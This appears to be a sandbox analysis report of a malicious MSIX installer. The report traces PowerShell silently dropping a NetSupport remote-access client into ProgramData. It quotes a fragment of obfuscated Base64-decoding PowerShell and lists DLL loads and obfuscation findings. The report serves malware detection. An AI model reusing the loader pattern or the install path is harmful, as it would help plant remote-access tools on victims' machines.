Source: C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.21.2771.0_x64__8wekyb3d8bbwe\AppInstaller.exe	Section loaded: urlmon.dll
Source: C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.21.2771.0_x64__8wekyb3d8bbwe\AppInstaller.exe	Section loaded: srvcli.dll
Source: C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.21.2771.0_x64__8wekyb3d8bbwe\AppInstaller.exe	Section loaded: netutils.dll
Source: C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.21.2771.0_x64__8wekyb3d8bbwe\AppInstaller.exe	Section loaded: dxgi.dll
Source: C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.21.2771.0_x64__8wekyb3d8bbwe\AppInstaller.exe	Section loaded: resourcepolicyclient.dll
Source: C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.21.2771.0_x64__8wekyb3d8bbwe\AppInstaller.exe	Section loaded: windows.applicationmodel.background.systemeventsbroker.dll
Source: C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.21.2771.0_x64__8wekyb3d8bbwe\AppInstaller.exe	Section loaded: biwinrt.dll
Source: C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.21.2771.0_x64__8wekyb3d8bbwe\AppInstaller.exe	Section loaded: mrmcorer.dll
Source: C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.21.2771.0_x64__8wekyb3d8bbwe\AppInstaller.exe	Section loaded: windows.staterepositoryclient.dll
Source: C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.21.2771.0_x64__8wekyb3d8bbwe\AppInstaller.exe	Section loaded: d3d11.dll
Source: C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.21.2771.0_x64__8wekyb3d8bbwe\AppInstaller.exe	Section loaded: d3d10warp.dll
Source: C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.21.2771.0_x64__8wekyb3d8bbwe\AppInstaller.exe	Section loaded: dxcore.dll
Source: C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.21.2771.0_x64__8wekyb3d8bbwe\AppInstaller.exe	Section loaded: profapi.dll
Source: C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.21.2771.0_x64__8wekyb3d8bbwe\AppInstaller.exe	Section loaded: appxdeploymentclient.dll
Source: C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.21.2771.0_x64__8wekyb3d8bbwe\AppInstaller.exe	Section loaded: d2d1.dll
Source: C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.21.2771.0_x64__8wekyb3d8bbwe\AppInstaller.exe	Section loaded: dwrite.dll
Source: C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.21.2771.0_x64__8wekyb3d8bbwe\AppInstaller.exe	Section loaded: bcp47mrm.dll
Source: C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.21.2771.0_x64__8wekyb3d8bbwe\AppInstaller.exe	Section loaded: textshaping.dll
Source: C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.21.2771.0_x64__8wekyb3d8bbwe\AppInstaller.exe	Section loaded: msvcp140_app.dll
Source: C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.21.2771.0_x64__8wekyb3d8bbwe\AppInstaller.exe	Section loaded: vcruntime140_1_app.dll
Source: C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.21.2771.0_x64__8wekyb3d8bbwe\AppInstaller.exe	Section loaded: vcruntime140_app.dll
Source: C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.21.2771.0_x64__8wekyb3d8bbwe\AppInstaller.exe	Section loaded: windows.ui.xaml.controls.dll
Source: C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.21.2771.0_x64__8wekyb3d8bbwe\AppInstaller.exe	Section loaded: windows.shell.servicehostbuilder.dll
Source: C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.21.2771.0_x64__8wekyb3d8bbwe\AppInstaller.exe	Section loaded: execmodelproxy.dll
Source: C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.21.2771.0_x64__8wekyb3d8bbwe\AppInstaller.exe	Section loaded: rmclient.dll
Source: C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.21.2771.0_x64__8wekyb3d8bbwe\AppInstaller.exe	Section loaded: uiamanager.dll
Source: C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.21.2771.0_x64__8wekyb3d8bbwe\AppInstaller.exe	Section loaded: windows.ui.core.textinput.dll
Source: C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.21.2771.0_x64__8wekyb3d8bbwe\AppInstaller.exe	Section loaded: windows.ui.immersive.dll
Source: C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.21.2771.0_x64__8wekyb3d8bbwe\AppInstaller.exe	Section loaded: dataexchange.dll
Source: C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.21.2771.0_x64__8wekyb3d8bbwe\AppInstaller.exe	Section loaded: cryptbase.dll
Source: C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.21.2771.0_x64__8wekyb3d8bbwe\AppInstaller.exe	Section loaded: winrttracing.dll
Source: C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.21.2771.0_x64__8wekyb3d8bbwe\AppInstaller.exe	Section loaded: windows.applicationmodel.dll
Source: C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.21.2771.0_x64__8wekyb3d8bbwe\AppInstaller.exe	Section loaded: windows.globalization.dll
Source: C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.21.2771.0_x64__8wekyb3d8bbwe\AppInstaller.exe	Section loaded: twinapi.dll
Source: C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.21.2771.0_x64__8wekyb3d8bbwe\AppInstaller.exe	Section loaded: directmanipulation.dll
Source: C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.21.2771.0_x64__8wekyb3d8bbwe\AppInstaller.exe	Section loaded: daxexec.dll
Source: C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.21.2771.0_x64__8wekyb3d8bbwe\AppInstaller.exe	Section loaded: fltlib.dll
Source: C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.21.2771.0_x64__8wekyb3d8bbwe\AppInstaller.exe	Section loaded: container.dll
Source: C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.21.2771.0_x64__8wekyb3d8bbwe\AppInstaller.exe	Section loaded: appxdeploymentclient.dll
Source: C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.21.2771.0_x64__8wekyb3d8bbwe\AppInstaller.exe	Section loaded: iphlpapi.dll
Source: C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.21.2771.0_x64__8wekyb3d8bbwe\AppInstaller.exe	Section loaded: userenv.dll
Source: C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.21.2771.0_x64__8wekyb3d8bbwe\AppInstaller.exe	Section loaded: profext.dll
Source: C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.21.2771.0_x64__8wekyb3d8bbwe\AppInstaller.exe	Section loaded: appcontracts.dll
Source: C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.21.2771.0_x64__8wekyb3d8bbwe\AppInstaller.exe	Section loaded: cdprt.dll
Source: C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.21.2771.0_x64__8wekyb3d8bbwe\AppInstaller.exe	Section loaded: cdp.dll
Source: C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.21.2771.0_x64__8wekyb3d8bbwe\AppInstaller.exe	Section loaded: umpdc.dll
Source: C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.21.2771.0_x64__8wekyb3d8bbwe\AppInstaller.exe	Section loaded: dsreg.dll
Source: C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.21.2771.0_x64__8wekyb3d8bbwe\AppInstaller.exe	Section loaded: msvcp110_win.dll
Source: C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.21.2771.0_x64__8wekyb3d8bbwe\AppInstaller.exe	Section loaded: cryptsp.dll
Source: C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.21.2771.0_x64__8wekyb3d8bbwe\AppInstaller.exe	Section loaded: appxpackaging.dll
Source: C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.21.2771.0_x64__8wekyb3d8bbwe\AppInstaller.exe	Section loaded: opcservices.dll
Source: C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.21.2771.0_x64__8wekyb3d8bbwe\AppInstaller.exe	Section loaded: xmllite.dll
Source: C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.21.2771.0_x64__8wekyb3d8bbwe\AppInstaller.exe	Section loaded: msxml6.dll
Source: C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.21.2771.0_x64__8wekyb3d8bbwe\AppInstaller.exe	Section loaded: cryptxml.dll
Source: C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.21.2771.0_x64__8wekyb3d8bbwe\AppInstaller.exe	Section loaded: webservices.dll
Source: C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.21.2771.0_x64__8wekyb3d8bbwe\AppInstaller.exe	Section loaded: rsaenh.dll
Source: C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.21.2771.0_x64__8wekyb3d8bbwe\AppInstaller.exe	Section loaded: msasn1.dll
Source: C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.21.2771.0_x64__8wekyb3d8bbwe\AppInstaller.exe	Section loaded: cryptowinrt.dll
Source: C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.21.2771.0_x64__8wekyb3d8bbwe\AppInstaller.exe	Section loaded: gpapi.dll
Source: C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.21.2771.0_x64__8wekyb3d8bbwe\AppInstaller.exe	Section loaded: certenroll.dll
Source: C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.21.2771.0_x64__8wekyb3d8bbwe\AppInstaller.exe	Section loaded: certca.dll
Source: C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.21.2771.0_x64__8wekyb3d8bbwe\AppInstaller.exe	Section loaded: dsparse.dll
Source: C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.21.2771.0_x64__8wekyb3d8bbwe\AppInstaller.exe	Section loaded: dpapi.dll
Source: C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.21.2771.0_x64__8wekyb3d8bbwe\AppInstaller.exe	Section loaded: windows.staterepositoryps.dll
Source: C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.21.2771.0_x64__8wekyb3d8bbwe\AppInstaller.exe	Section loaded: windowscodecs.dll
Source: C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.21.2771.0_x64__8wekyb3d8bbwe\AppInstaller.exe	Section loaded: threadpoolwinrt.dll
Source: C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.21.2771.0_x64__8wekyb3d8bbwe\AppInstaller.exe	Section loaded: dwmapi.dll
Source: C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.21.2771.0_x64__8wekyb3d8bbwe\AppInstaller.exe	Section loaded: ninput.dll
Source: C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.21.2771.0_x64__8wekyb3d8bbwe\AppInstaller.exe	Section loaded: onecorecommonproxystub.dll
Source: C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.21.2771.0_x64__8wekyb3d8bbwe\AppInstallerFullTrustAppServiceClient.exe	Section loaded: msvcp140.dll
Source: C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.21.2771.0_x64__8wekyb3d8bbwe\AppInstallerFullTrustAppServiceClient.exe	Section loaded: vcruntime140_1.dll
Source: C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.21.2771.0_x64__8wekyb3d8bbwe\AppInstallerFullTrustAppServiceClient.exe	Section loaded: vcruntime140.dll
Source: C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.21.2771.0_x64__8wekyb3d8bbwe\AppInstallerFullTrustAppServiceClient.exe	Section loaded: vcruntime140.dll
Source: C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.21.2771.0_x64__8wekyb3d8bbwe\AppInstallerFullTrustAppServiceClient.exe	Section loaded: vcruntime140_1.dll
Source: C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.21.2771.0_x64__8wekyb3d8bbwe\AppInstallerFullTrustAppServiceClient.exe	Section loaded: kernel.appcore.dll
Source: C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.21.2771.0_x64__8wekyb3d8bbwe\AppInstallerFullTrustAppServiceClient.exe	Section loaded: twinapi.appcore.dll
Source: C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.21.2771.0_x64__8wekyb3d8bbwe\AppInstallerFullTrustAppServiceClient.exe	Section loaded: wintypes.dll
Source: C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.21.2771.0_x64__8wekyb3d8bbwe\AppInstallerFullTrustAppServiceClient.exe	Section loaded: rometadata.dll
Source: C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.21.2771.0_x64__8wekyb3d8bbwe\AppInstallerFullTrustAppServiceClient.exe	Section loaded: windows.storage.applicationdata.dll
Source: C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.21.2771.0_x64__8wekyb3d8bbwe\AppInstallerFullTrustAppServiceClient.exe	Section loaded: windows.storage.dll
Source: C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.21.2771.0_x64__8wekyb3d8bbwe\AppInstallerFullTrustAppServiceClient.exe	Section loaded: wldp.dll
Source: C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.21.2771.0_x64__8wekyb3d8bbwe\AppInstallerFullTrustAppServiceClient.exe	Section loaded: propsys.dll
Source: C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.21.2771.0_x64__8wekyb3d8bbwe\AppInstallerFullTrustAppServiceClient.exe	Section loaded: uxtheme.dll
Source: C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.21.2771.0_x64__8wekyb3d8bbwe\AppInstallerFullTrustAppServiceClient.exe	Section loaded: appcontracts.dll
Source: C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.21.2771.0_x64__8wekyb3d8bbwe\AppInstallerFullTrustAppServiceClient.exe	Section loaded: windows.applicationmodel.dll
Source: C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.21.2771.0_x64__8wekyb3d8bbwe\AppInstallerFullTrustAppServiceClient.exe	Section loaded: windows.staterepositoryps.dll
Source: C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.21.2771.0_x64__8wekyb3d8bbwe\AppInstallerFullTrustAppServiceClient.exe	Section loaded: cdprt.dll
Source: C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.21.2771.0_x64__8wekyb3d8bbwe\AppInstallerFullTrustAppServiceClient.exe	Section loaded: cdp.dll
Source: C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.21.2771.0_x64__8wekyb3d8bbwe\AppInstallerFullTrustAppServiceClient.exe	Section loaded: umpdc.dll
Source: C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.21.2771.0_x64__8wekyb3d8bbwe\AppInstallerFullTrustAppServiceClient.exe	Section loaded: dsreg.dll
Source: C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.21.2771.0_x64__8wekyb3d8bbwe\AppInstallerFullTrustAppServiceClient.exe	Section loaded: msvcp110_win.dll
Source: C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.21.2771.0_x64__8wekyb3d8bbwe\AppInstallerFullTrustAppServiceClient.exe	Section loaded: cryptsp.dll
Source: C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.21.2771.0_x64__8wekyb3d8bbwe\AppInstallerFullTrustAppServiceClient.exe	Section loaded: appxdeploymentclient.dll
Source: C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.21.2771.0_x64__8wekyb3d8bbwe\AppInstallerFullTrustAppServiceClient.exe	Section loaded: capauthz.dll
Source: C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.21.2771.0_x64__8wekyb3d8bbwe\AppInstallerFullTrustAppServiceClient.exe	Section loaded: msasn1.dll
Source: C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.21.2771.0_x64__8wekyb3d8bbwe\AppInstallerFullTrustAppServiceClient.exe	Section loaded: ntmarta.dll
Source: C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.21.2771.0_x64__8wekyb3d8bbwe\AppInstallerFullTrustAppServiceClient.exe	Section loaded: windows.staterepositorycore.dll
Source: C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.21.2771.0_x64__8wekyb3d8bbwe\AppInstallerFullTrustAppServiceClient.exe	Section loaded: windows.shell.servicehostbuilder.dll
Source: C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.21.2771.0_x64__8wekyb3d8bbwe\AppInstallerFullTrustAppServiceClient.exe	Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.21.2771.0_x64__8wekyb3d8bbwe\AppInstallerFullTrustAppServiceClient.exe	Section loaded: ondemandbrokerclient.dll
Source: C:\Program Files\WindowsApps\WSJ_4.12.77.0_x64__v3spfewvfazpe\PsfLauncher64.exe	Section loaded: psfruntime64.dll
Source: C:\Program Files\WindowsApps\WSJ_4.12.77.0_x64__v3spfewvfazpe\PsfLauncher64.exe	Section loaded: kernel.appcore.dll
Source: C:\Program Files\WindowsApps\WSJ_4.12.77.0_x64__v3spfewvfazpe\PsfLauncher64.exe	Section loaded: windows.storage.dll
Source: C:\Program Files\WindowsApps\WSJ_4.12.77.0_x64__v3spfewvfazpe\PsfLauncher64.exe	Section loaded: wldp.dll
Source: C:\Program Files\WindowsApps\WSJ_4.12.77.0_x64__v3spfewvfazpe\PsfLauncher64.exe	Section loaded: daxexec.dll
Source: C:\Program Files\WindowsApps\WSJ_4.12.77.0_x64__v3spfewvfazpe\PsfLauncher64.exe	Section loaded: fltlib.dll
Source: C:\Program Files\WindowsApps\WSJ_4.12.77.0_x64__v3spfewvfazpe\PsfLauncher64.exe	Section loaded: profapi.dll
Source: C:\Program Files\WindowsApps\WSJ_4.12.77.0_x64__v3spfewvfazpe\PsfLauncher64.exe	Section loaded: container.dll
Source: C:\Program Files\WindowsApps\WSJ_4.12.77.0_x64__v3spfewvfazpe\PsfLauncher64.exe	Section loaded: appxdeploymentclient.dll

Source: C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.21.2771.0_x64__8wekyb3d8bbwe\AppInstaller.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{95E15D0A-66E6-93D9-C53C-76E6219D3341}\InProcServer32

Jump to behavior

Source: Google Drive.lnk.0.dr	LNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
Source: YouTube.lnk.0.dr	LNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
Source: Sheets.lnk.0.dr	LNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
Source: Gmail.lnk.0.dr	LNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
Source: Slides.lnk.0.dr	LNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
Source: Docs.lnk.0.dr	LNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

File written: C:\ProgramData\netsupport\client\client32.ini

Jump to behavior

Source: C:\ProgramData\netsupport\client\client32.exe

File opened: C:\Windows\SysWOW64\riched32.dll

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll

Jump to behavior

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

File opened: C:\ProgramData\netsupport\client\msvcr100.dll

Jump to behavior

Source:	Binary string: D:\a\1\s\x64\Release\PsfLauncher64.pdb source: PsfLauncher64.exe, 00000014.00000000.1745032807.00007FF6C367E000.00000002.00000001.01000000.0000000E.sdmp
Source:	Binary string: D:\a\1\s\x64\Release\PsfRuntime64.pdb source: PsfRunDll64.exe, 00000016.00000002.1749156584.00007FFA1B0EF000.00000002.00000001.01000000.0000000F.sdmp
Source:	Binary string: E:\nsmsrc\nsm\1210\1210\ctl32\Full\pcichek.pdb source: powershell.exe, 0000001A.00000002.1968531120.0000023162F35000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001A.00000002.1968531120.0000023162F1C000.00000004.00000800.00020000.00000000.sdmp, client32.exe, 00000020.00000002.2653892978.000000006C1B2000.00000002.00000001.01000000.00000019.sdmp, PCICHEK.DLL.26.dr
Source:	Binary string: msvcr100.i386.pdb source: powershell.exe, 0000001A.00000002.1968531120.00000231631AF000.00000004.00000800.00020000.00000000.sdmp, client32.exe, client32.exe, 00000020.00000002.2639330298.000000006C0F1000.00000020.00000001.01000000.0000001A.sdmp, msvcr100.dll.26.dr
Source:	Binary string: E:\nsmsrc\nsm\1210\1210f\client32\Release\PCICL32.pdb source: client32.exe, 00000020.00000002.2586614492.000000001118F000.00000002.00000001.01000000.00000017.sdmp, PCICL32.DLL.26.dr
Source:	Binary string: E:\nsmsrc\nsm\1210\1210\ctl32\Full\pcichek.pdbN source: powershell.exe, 0000001A.00000002.1968531120.0000023162F35000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001A.00000002.1968531120.0000023162F1C000.00000004.00000800.00020000.00000000.sdmp, PCICHEK.DLL.26.dr
Source:	Binary string: E:\nsmsrc\nsm\1210\1210f\ctl32\release\htctl32.pdbL source: powershell.exe, 0000001A.00000002.1968531120.0000023162E0E000.00000004.00000800.00020000.00000000.sdmp, client32.exe, 00000020.00000002.2636652234.000000006BEF0000.00000002.00000001.01000000.0000001B.sdmp, HTCTL32.DLL.26.dr
Source:	Binary string: E:\nsmsrc\nsm\1210\1210\AudioCapture\Release\AudioCapture.pdb source: powershell.exe, 0000001A.00000002.1968531120.0000023162D8C000.00000004.00000800.00020000.00000000.sdmp, AudioCapture.dll.26.dr
Source:	Binary string: client32_ctr.pdb0\1100\client32\Release\client32_ctr.pdbP source: powershell.exe, 0000001A.00000002.1968531120.0000023163150000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001A.00000002.1968531120.0000023163131000.00000004.00000800.00020000.00000000.sdmp, client32.exe.26.dr
Source:	Binary string: client32_ctr.pdb source: powershell.exe, 0000001A.00000002.1968531120.0000023163150000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001A.00000002.1968531120.0000023163131000.00000004.00000800.00020000.00000000.sdmp, client32.exe.26.dr
Source:	Binary string: E:\nsmsrc\nsm\1210\1210\ctl32\release\tcctl32.pdbP source: powershell.exe, 0000001A.00000002.1968531120.000002316309F000.00000004.00000800.00020000.00000000.sdmp, TCCTL32.DLL.26.dr
Source:	Binary string: E:\nsmsrc\nsm\1210\1210f\ctl32\release\htctl32.pdb source: powershell.exe, 0000001A.00000002.1968531120.0000023162E0E000.00000004.00000800.00020000.00000000.sdmp, client32.exe, 00000020.00000002.2636652234.000000006BEF0000.00000002.00000001.01000000.0000001B.sdmp, HTCTL32.DLL.26.dr
Source:	Binary string: E:\nsmsrc\nsm\1210\1210\ctl32\Release\pcicapi.pdb source: powershell.exe, 0000001A.00000002.1968531120.0000023163353000.00000004.00000800.00020000.00000000.sdmp, client32.exe, 00000020.00000002.2654970934.0000000074675000.00000002.00000001.01000000.00000018.sdmp, pcicapi.dll.26.dr
Source:	Binary string: D:\a\1\s\x64\Release\PsfRunDll64.pdb source: PsfRunDll64.exe, 00000016.00000000.1747207751.00007FF695D50000.00000002.00000001.01000000.00000010.sdmp
Source:	Binary string: 0\1100\client32\Release\client32_ctr.pdb source: powershell.exe, 0000001A.00000002.1968531120.0000023163150000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001A.00000002.1968531120.0000023163131000.00000004.00000800.00020000.00000000.sdmp, client32.exe.26.dr
Source:	Binary string: E:\nsmsrc\nsm\1210\1210\ctl32\release\tcctl32.pdb source: powershell.exe, 0000001A.00000002.1968531120.000002316309F000.00000004.00000800.00020000.00000000.sdmp, TCCTL32.DLL.26.dr
Source:	Binary string: C:\Windows\symbols\dll\mscorlib.pdb source: powershell.exe, 0000001A.00000002.2187481682.00000231793A5000.00000004.00000020.00020000.00000000.sdmp

Data Obfuscation

Found suspicious powershell code related to unpacking or dynamic code loading

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Anti Malware Scan Interface: FromBase64String($UbzXTvljYeqTglbzWFYnHcYrl)) $djCLjZagYgaEPajHwbPPt = "usradm" if ($uxuQItyI.Contains($djCLjZagYgaEPajHwbPPt)) { try { $oXtyKRiEpmXFEtumyER
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Anti Malware Scan Interface: FromBase64String($UbzXTvljYeqTglbzWFYnHcYrl)) $djCLjZagYgaEPajHwbPPt = "usradm" if ($uxuQItyI.Contains($djCLjZagYgaEPajHwbPPt)) { try { $oXtyKRiEpmXFEtumyER

Contains functionality to dynamically determine API calls

Source: C:\ProgramData\netsupport\client\client32.exe

32_2_11029200

PE file contains sections with non-standard names

Source: PCICL32.DLL.26.dr

Static PE information: section name: .hhshare

Uses code obfuscation techniques (call, push, ret)

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 23_2_00007FF9BAF4636C push ds; ret	23_2_00007FF9BAF4636F
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 23_2_00007FF9BB1A46DC push ds; retf	23_2_00007FF9BB1A474F
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 23_2_00007FF9BB1A6FA5 pushad ; retf	23_2_00007FF9BB1A6FA6
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 23_2_00007FF9BB1A6EBD push eax; retf	23_2_00007FF9BB1A6EBE
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 23_2_00007FF9BB5447F5 push ebx; iretd	23_2_00007FF9BB5447FA
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 23_2_00007FF9BB6A282A pushad ; iretd	23_2_00007FF9BB6A2832
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 23_2_00007FF9BB6912D0 pushad ; ret	23_2_00007FF9BB6912E4
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 23_2_00007FF9BB6962BC pushad ; ret	23_2_00007FF9BB6962B4
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 23_2_00007FF9BB69629C pushad ; ret	23_2_00007FF9BB6962B4
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 23_2_00007FF9BB6980FC push ebx; ret	23_2_00007FF9BB69813A
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 25_2_00007FF9BAF68133 push ebx; ret	25_2_00007FF9BAF6813A
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 25_2_00007FF9BB1C4C8E push eax; iretd	25_2_00007FF9BB1C4C8F
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 25_2_00007FF9BB1C7BD4 push esi; ret	25_2_00007FF9BB1C7BD7
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 25_2_00007FF9BB1C46DC push ds; retf	25_2_00007FF9BB1C474F
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 25_2_00007FF9BB1C4D76 pushad ; iretd	25_2_00007FF9BB1C4D77
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 25_2_00007FF9BB3F33A1 push edi; retf	25_2_00007FF9BB3F33A6
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 25_2_00007FF9BB575776 pushad ; retf	25_2_00007FF9BB5759DD
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 25_2_00007FF9BB5758FF pushad ; retf	25_2_00007FF9BB5759DD
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 25_2_00007FF9BB572CE0 push esp; retf	25_2_00007FF9BB572CE1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 25_2_00007FF9BB77225B push ds; retf	25_2_00007FF9BB77226D
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 25_2_00007FF9BB77325B push cs; retf	25_2_00007FF9BB773272
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 25_2_00007FF9BB770E78 push ds; retf	25_2_00007FF9BB770E79
